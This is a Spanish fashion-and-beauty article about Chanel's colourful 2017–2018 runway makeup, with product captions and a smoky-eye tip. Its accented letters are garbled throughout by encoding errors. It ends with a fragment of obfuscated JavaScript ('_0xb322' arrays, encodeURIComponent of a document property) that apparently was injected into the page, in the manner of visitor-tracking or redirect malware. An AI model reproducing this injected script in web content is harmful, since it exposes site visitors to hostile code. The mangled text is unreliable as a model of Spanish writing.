Desde principio de aAi??o, la casa de belleza Chanel nos venAi??a insinuando que el maquillaje colorido recuperarAi??a su espacio y dejarAi??a en segundo plano al nude y al no make up. Primero, realizA? el lanzamiento de su colorida colecciA?n de sombras individuales, denominada Ombre PremiA?re, compuesta por tonos llamativos como azul, amarillo y rojo para colorear los ojos.

Luego, durante suAi??desfile Alta Costura OtoAi??o/Invierno 2017/18 en la Semana de la Moda de ParAi??s, el pasado mes de julio,Ai??nos sorprendiA? con una propuesta de pA?rpados multicolor en el maquillaje, con el que aportaba un toque de fantasAi??a a su colecciA?n elegante, sobria y funcional.

Y recientemente, durante su pasarela en el fashion week de La Ciudad de la Luz para la temporada Primavera/Verano 2018, la lluvia de tonos vibrantes siguiA? en pie.

Los tonos fuertes en el maquillaje siempre te harA?n proyectar como una mujer segura de ti misma. 2018 Spring-Summer CHANEL Ready-To-Wear Show Backstage/Makeup Chanel/ Chanel 2017 Photo: BenoAi??t Peverelli

Las modelos, que parecAi??an ninfas de un mundo acuA?tico, entre los acantilados rocosos y las cascadas del escenario inspirado en las Gargantas del Verdon, llevaban sus pA?rpados en azul intenso y los labios de rojo elegante. Una combinaciA?n arriesgada, pero muy atinada para darle un twistAi??a los looks sobrios donde el legendario creativo de la marca Karl Legerfeld, reinventA? la funcionalidad del plA?stico y la mezclA? con el icA?nico y elegante tejido tweed.

Durante el desfile de Chanel en el Paris Fashion Week, las modelos lucieron botas, capuchas, mangas, bolsas de playa y sombreros de plA?sticoAi??transparente, que combinaron con llamativos pendientes en forma de gotas de agua y elegantes prendas en tweed.Ai?? EFE/IAN LANGSDON

Las mejillas se ruborizaron con rosa y se colocaron puntos de luz en la frente, los pA?mulos, la nariz y el mentA?n, para un efecto de piel saludable y satinada. Las modelos tambiAi??n llevaron el cabello recogido, con efecto mojado, lo cual las hizo lucir mA?s frescas.

Sombra Les 4 OmbresS – Road Movie NAi??288 Tavel Diary (Collection Automne/Hiver 2017). Photo: BenoAi??t Peverelli

Una forma de lograr este look que propuso Chanel, es colocando sombras oscuras en todo el pA?rpado mA?vil y difuminarlas con un tono mA?s claro hacia el hueso de la ceja, logrando un efecto de smokey eyes. TambiAi??n se debe colocar sombra en el pA?rpado inferior, para darle mA?s profundidad a la mirada.

Barra de labios Rouge Allure Velvet – First Light NAi??64 TravelL Diary (Collection Automne/Hiver 2017)/ Brillo Rouge Coco Gloss Top Coat – Impulsion NAi??776 (Collection Rouge Coco Gloss 2017) Photo: BenoAi??t Peverelli

El brillo tambiAi??n regresa. Sobre la barra de labios coral, se puede aplicar un poco de gloss para darle un efecto de humedadAi??Ai??a la boca, en especial en los dAi??as calurosos.

2[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}